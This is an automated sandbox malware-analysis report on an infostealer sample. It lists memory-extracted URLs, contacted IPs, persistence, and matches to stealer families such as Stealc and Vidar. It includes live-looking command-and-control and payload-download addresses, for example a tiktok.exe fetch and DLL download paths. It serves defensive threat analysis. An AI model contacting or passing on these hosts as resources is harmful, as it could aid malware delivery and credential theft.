                                                                                                    https://www.ecosia.org/newtab/MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.symauth.com/cps0(run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bru42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFontsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666BSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://185.172.128.76/15f649199f40275b/nss3.dllUKu42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://dc.services.visualstudio.com/fSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://profiler.monitor.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.symauth.com/rpa00run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.newtonsoft.com/jsonschemaSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.info-zip.org/run.exe, 00000002.00000002.1805902147.000000000398E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.00000000053DF000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003DF5000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.00000000053D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-u42w.3.exe, 00000005.00000003.2038133988.00000000025F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://westus2-2.in.applicationinsights.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938981217.00000173F3C1D000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.iolo.com/company/legal/eula/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://185.172.128.76u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                        • 10%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://dejavu.sourceforge.net/wiki/index.php/LicenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://scripts.sil.org/OFLThisSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFu42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/itfoundry/Poppins)&&&&zSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/itfoundry/Poppins)SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://snapshot.monitor.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/itfoundry/Poppins)&&&&vSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ocsp.sectigo.com0g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.iolo.com/company/legal/eula/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.newtonsoft.com/jsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://westus2-2.in.applicationinsights.azure.com/v2/trackSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://duckduckgo.com/chrome_newtabSMSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u42w.0.exe, 00000001.00000003.1767072510.00000000231BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://google.comg77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://dc.services.visualstudio.com/v2/trackSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://185.172.128.203/tiktok.exe00u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                      • 15%, Virustotal, Browse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.codeplex.com/prismSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://taskscheduler.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://185.172.128.76/15f649199f40275b/softokn3.dllIu42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • 5%, Virustotal, Browse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.monSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://compositewpf.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://sectigo.com/CPS0Dg77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitorSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exeu42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/LicSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://rt.services.visualstudio.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exeu42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://185.172.128.203/tiktok.exequ42w.0.exe, 00000001.00000002.2112134672.00000000292B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.sqlite.org/copyright.html.u42w.0.exe, 00000001.00000002.2117404121.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://github.com/JamesNK/Newtonsoft.JsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://www.vmware.com/0/run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://185.172.128.76/3cd2b41cbde8fc9c.phptu42w.0.exe, 00000001.00000002.2112134672.00000000292B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • 3%, Virustotal, Browse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://185.172.128.76/15f649199f40275b/sqlite3.dll9u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • 8%, Virustotal, Browse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    185.172.128.90
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUfalse
                                                                                                                                                                                    185.172.128.228
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUfalse
                                                                                                                                                                                    185.172.128.203
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUfalse
                                                                                                                                                                                    20.157.87.45
                                                                                                                                                                                    svc.iolo.comUnited States
                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    91.215.85.66
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    34665PINDC-ASRUtrue
                                                                                                                                                                                    185.172.128.76
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUtrue
                                                                                                                                                                                    176.97.76.106
                                                                                                                                                                                    note.padd.cn.comUnited Kingdom
                                                                                                                                                                                    43658INTRAFFIC-ASUAfalse
                                                                                                                                                                                    185.172.128.59
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUfalse
                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                    Analysis ID:1431471
                                                                                                                                                                                    Start date and time:2024-04-25 09:03:05 +02:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 12m 51s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:27
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:g77dRQ1Csm.exe
                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                    Original Sample Name:41de8e3e7412b6e97b60fdbfdd24b0ba.exe
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@27/66@4/8
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 85%
                                                                                                                                                                                    • Number of executed functions: 113
                                                                                                                                                                                    • Number of non-executed functions: 250
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.126.29.8, 40.126.29.15, 40.126.29.5, 20.190.157.11, 40.126.29.9, 40.126.29.12, 40.126.29.14, 40.126.29.7, 72.21.81.240, 13.85.23.86, 192.229.211.108, 20.3.187.198, 20.189.173.22, 20.166.126.56, 184.31.62.93, 20.9.155.145
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, gig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    08:04:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
                                                                                                                                                                                    09:04:18API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                    09:04:34API Interceptor152326x Sleep call for process: MSBuild.exe modified
                                                                                                                                                                                    09:04:35API Interceptor830190x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
                                                                                                                                                                                    09:04:41API Interceptor2x Sleep call for process: cmd.exe modified
                                                                                                                                                                                    09:05:07API Interceptor452522x Sleep call for process: FCBAECGIEB.exe modified
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    185.172.128.90QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                    j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
                                                                                                                                                                                    YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                    bhhPvHM59A.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
                                                                                                                                                                                    kOX6mvvEZv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                    EvRwwa6vJW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                    6wBnmIAQNW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                    QoAgJHA78f.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                    zLwT7vCojz.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                    H6ohQMZygb.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                    185.172.128.228QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.228/ping.php?substr=seven
                                                                                                                                                                                    j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                    YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                    bhhPvHM59A.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.228/ping.php?substr=two
                                                                                                                                                                                    kOX6mvvEZv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                    EvRwwa6vJW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                    6wBnmIAQNW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                    QoAgJHA78f.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                    zLwT7vCojz.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                    H6ohQMZygb.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    fp2e7a.wpc.phicdn.nethttp://rfpteams.ksplastlc.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    https://app.milanote.com/1RZbnl1zfBXuaf?p=r2B66sphbV4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    http://decktop.us/gORiyfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 192.229.211.108
